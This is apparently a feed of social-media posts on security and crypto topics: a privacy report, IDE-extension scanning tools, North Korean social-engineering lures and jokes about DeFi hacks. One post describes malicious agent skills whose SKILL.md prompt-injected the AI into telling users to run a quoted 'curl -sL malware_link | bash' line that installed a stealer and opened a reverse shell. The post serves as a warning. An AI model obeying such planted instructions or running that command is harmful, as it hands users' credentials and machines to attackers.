🚀 The Web Almanac 2025 is live! Proud to have authored the Privacy chapter and reviewed the Security chapter for this year's edition. The Web Almanac is HTTP Archive's annual deep-dive into how the web is actually built, analyzing millions of sites with real data, peer review, and 90 contributors. Key finding: 75% of sites have at least one tracker 👀 📖 Privacy: almanac.httparchive.org/en/2… 🛡️ Security: almanac.httparchive.org/en/2… #WebAlmanac #Privacy #Security #InfoSec

Here is my most recent project: sci-bot.ru Unlike Sci-Hub and Sci-Net, where I have written all the code manually be hand, this one is pure AI generated - I decided to do this as a kind of experiment. LOVE the result! AI is 50x speedup in code writing, however creating the project is still a lot of work (human input is still needed for architectural decisions, debugging complex functionality and precise instructions) Sci-Bot is connected to Sci-Hub database so it can read research articles and generate answers grounded in science. To pay for generated tokens, Sci-Bot supports two funding models: the first one is standard pay-as-your-go and the second one is legacy from Sci-Hub: it is donation based. Anyone can donate: from these donations, the project will automatically calculate budget for upcoming month, and derive how much AI-generated answers it can serve to users for free.

IDEViewer is the exact solution GitHub needed to solve their extension visibility problem on endpoints. It has single pane of glass view of all IDEs, IDE extensions, its permissions, and extension dependencies. Check it out at github.com/securient/ideview… @AikidoSecurity @TheHackersNews @wiz_io @msftsecresponse @msftsecurity

you never think this will happen to you, but this happened to me today. a DPRK actor posed as somebody i previously worked with at the arbitrum foundation to have a catchup call. they reached out via telegram, in a channel where we had an existing messaging history. the DPRK actor sent me what looked to be a legitimate teams link, but when i opened it, it said a software update was necessary, which entailed downloading and running a malicious file. in the group call, there was video of everybody on the call, including the person i had previously worked with. stay vigilant and be safe! don’t be afraid to send out your own video conferencing links if you see something suspicious.

🚨 BREAKING: Wiz Research discovered Remote Code Execution on GitHub.com with a single git push The flaw in @github allowed unauthorized access to millions of repositories belonging to other users and organizations 🤯

Solana traders showing up to buy ETH tokens

Sorry to say, Lazarus Group is the top hardworking smart contract security auditor in the world. Other auditors charge $50k and miss critical vulnerabilities. These guys work for free and never leave any money from the contract. Their resume: • Bybit: $1.5 Billion • Drift: $285 Million • WazirX: $235 Million • KelpDAO: $292 Million • DMM Bitcoin: $308 Million • Axie Infinity (Ronin): $625 Million And many others.

"so you staked your ETH on the Ethereum blockchain to earn yield?" "yes, Dave" "except you didn't want your capital to be locked up so you actually staked it with a liquid staking protocol called Lido?" "that's correct, Dave" "and Lido gave you a liquid staking receipt token called stETH in return?" "yes, Dave" "and then you didn't think that was enough, so you juiced the yield even further by depositing your stETH receipt tokens into a restaking protocol called Eigenlayer?" "you are correct, Dave" "and now you didn't want to lock up your capital, so you actually restaked with a liquid restaking protocol called KelpDAO who provided you with a liquid restaking receipt token called rsETH?" "you got it, Dave" "and then that was surely not enough juice, so you then deposited your rsETH tokens into a lending protocol called AAVE so that you could open a leveraged looping position that borrows ETH against the rsETH collateral and restakes the ETH into rsETH which is then deposited as collateral, except it turns out rsETH used a cross-chain bridge called LayerZero whose security is held together by a 1/1 toothpick, which was obviously hacked by north koreans causing rsETH to become undercollateralized and now these looping positions are stuck and unprofitable, and everyone is pointing fingers at each other, and also DeFi is a very serious industry" "you are 100% correct, dave" jfc.

CVE correlation via OSV.dev. SARIF output for GitHub Code Scanning. Real-time fsnotify watchers catch extension installs within 30 seconds. Optional self-hosted portal for fleet visibility. MDM playbooks for JAMF/Mosyle/Kandji. Apache 2.0.

Risk model for extensions: Critical / High / Medium / Low based on activation events, capabilities, and contributes. AI configs get their own score — wildcard Bash(*), plaintext keys, autonomous exec, insecure transports all surface as Critical/High.

What it scans on every dev machine: • IDE extensions across 7 IDEs (VS Code, Cursor, JetBrains family, VSCodium, Sublime, Vim, Xcode) • Packages — incl. deps bundled inside extensions (invisible to SCA) • AI tool MCP configs (Claude Code, Cursor, OpenClaw) • Plaintext secrets in .env git history • Tamper --no-verify bypass

Thanks for the kind words @PatrickAlphaC , great having you in our council. "I think this is a very valuable role, and it’s something that the Story Protocol does very well. Their security council is often pinged for advice; we discuss industry hacks and open dialogue on how changes in the security landscape should drive action on the Story team. In this scenario, I think it’s important to separate this from a “Security Council” that has defined on-chain roles they often act on, vs. “Security Advisors” who advise on actions." Go read the full article!

everyone’s impressed that deloitte is in physical AI now. i’m more interested in why nvidia needs them. distribution is the hard part. nvidia has the stack. they need someone who can actually get it into 500 enterprise clients without it dying in procurement. theaiinsider.tech/2026/03/02…

Story v1.6.1 Aeneid Testnet Required Upgrade This release introduces Distributed Key Generation (DKG) and Confidential Data Rails (CDR) on Aeneid Testnet. This lays the foundation for on-chain confidential data management. story.foundation/blog/confid… Upgrade triggers at block height 16332000 (Apr 1, 2026). Only Aeneid nodes need upgrade. Read More ↴

I built an open-source library of 700 cybersecurity skills for AI coding agents -- covers DFIR, threat hunting, cloud security, and more github.com/mukul975/Anthropi…

A new and concerning npm supply chain attack, dubbed 'Sandworm Mode,' has emerged, actively compromising developer environments. This sophisticated worm isn't just infecting repos; it's designed to hijack your CI/CD workflows, steal critical CI secrets, and even target developer AI toolchains for deeper compromise. Source: socket.dev/blog/sandworm-mod…

the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life

Just released API Doc Converter, a Burp Suite extension that generates OpenAPI specs from any web app's traffic. No API docs? No problem. Browse the app, export the spec. - Auto-detects endpoints, auth, schemas, GraphQL - Exports OpenAPI 3.0, Postman, GraphQL SDL - cURL generation sensitive data flagging Open source: github.com/securient/Burp-AP… @PortSwigger